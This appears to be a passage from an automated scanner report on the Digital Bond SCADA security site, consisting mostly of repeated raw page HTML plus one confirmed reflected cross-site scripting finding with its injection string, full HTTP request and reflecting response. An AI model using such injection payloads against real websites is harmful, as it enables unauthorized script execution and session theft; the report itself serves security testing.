powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=8" title="Industrial Defender"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/BWS6XY_banner_2011.02.22b.gif" alt="Industrial Defender" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-content/themes/atahualpa/\'\"--></style></script><script>netsparker(0x000467)</script>/?_login=4a81e58a73"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-content/themes/atahualpa/\'\"--></style></script><script>netsparker(0x000467)</script>/?_login=046736026e" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being a..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:35 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-content Themes Atahualpa '"-->< Style>< Script><script>netsparker(0x000467)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=8" title="Industrial Defender"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/BWS6XY_banner_2011.02.22b.gif" alt="Industrial Defender" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-content/themes/atahualpa/\'\"--></style></script><script>netsparker(0x000467)</script>/?_login=4a81e58a73"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-content/themes/atahualpa/\'\"--></style></script><script>netsparker(0x000467)</script>/?_login=046736026e" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being a..
|
- /wp-content/themes/atahualpa/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000471)%3C/script%3E
/wp-content/themes/atahualpa/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000471)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000471)</script> |
Request
GET /wp-content/themes/atahualpa/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000471)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-content Themes Atahualpa Js '"-->< Style>< Script><script>netsparker(0x000471)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom 